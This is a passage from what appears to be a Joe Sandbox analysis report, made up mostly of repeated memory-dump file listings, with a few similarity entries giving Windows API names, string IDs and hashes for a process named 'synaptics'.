                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C8FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C900000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C903000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C905000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C907000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C909000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2145111565.000000006C90D000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c6e0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Time$ErrorLastSystem$Filegetsockoptrecvfromsetsockopt
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2936331339-0
                                                                                                                                                                                                                                    • Opcode ID: be02e0de0a0c149496196859fa498c69499c88fef5e377242ccfda7765554dc8
                                                                                                                                                                                                                                    • Instruction ID: ea3f001e3240f8f498e58caad9903694326e88c8f41680ebfe79001b7a433204
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be02e0de0a0c149496196859fa498c69499c88fef5e377242ccfda7765554dc8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72412572A08301AFD7208F21CD44F6B77A8EF99708F44023AFA4596A42E771E559CBD6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2118561607.000000006C691000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C691000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_20_2_6c691000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: ABCMeta$GenericMeta$TypingMeta$_ProtocolMeta
                                                                                                                                                                                                                                    • API String ID: 0-892341833
                                                                                                                                                                                                                                    • Opcode ID: 0f9735d77a6c9f074c1ed0170d400c2c4671a861f58495b14f289952e7af7e53
                                                                                                                                                                                                                                    • Instruction ID: 0c166feccc302fd1b782896c8176f42c05852790100e9121bc2eb6bdd5c2a6af
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f9735d77a6c9f074c1ed0170d400c2c4671a861f58495b14f289952e7af7e53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6D128706883429BC7008F679C8966B7BF5AF06728F180678EE4D8B741D722ED09C75E
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetSystemTime.KERNEL32(?), ref: 6C719CB6
                                                                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 6C719CC6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000014.00000002.2120918855.000000006C70F000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C6E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120807504.000000006C6E0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6ED000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C6FE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C720000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C724000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C735000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C737000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C73E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C740000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C742000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C744000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C749000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C74B000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C75E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C760000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C762000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C764000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C766000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C768000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C76E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C770000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C772000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C780000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C791000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7A9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AC000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7AE000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B0000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7B2000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7C9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7D9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7DF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E3000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E5000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7E7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F7000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7F9000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FB000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FD000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C7FF000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C801000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C812000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C81E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C820000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C822000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C824000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C826000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C828000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C82E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C830000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C832000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C834000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C836000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C838000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C83E000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C841000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C843000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C854000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C856000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C858000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2120918855.000000006C85A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C865000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C867000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C869000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C86B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C874000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C876000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C878000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C87E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C880000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C882000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C884000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C886000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C893000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C898000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89A000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C89E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A2000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8A8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AA000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AC000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8AE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8B6000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8C9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8CD000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E1000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E7000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8E9000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EB000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8ED000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2138037679.000000006C8EF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000014.00000002.2144935941.000000006C8F7000.00000004.00000001.01000000.0000000D.sdmpDownload File
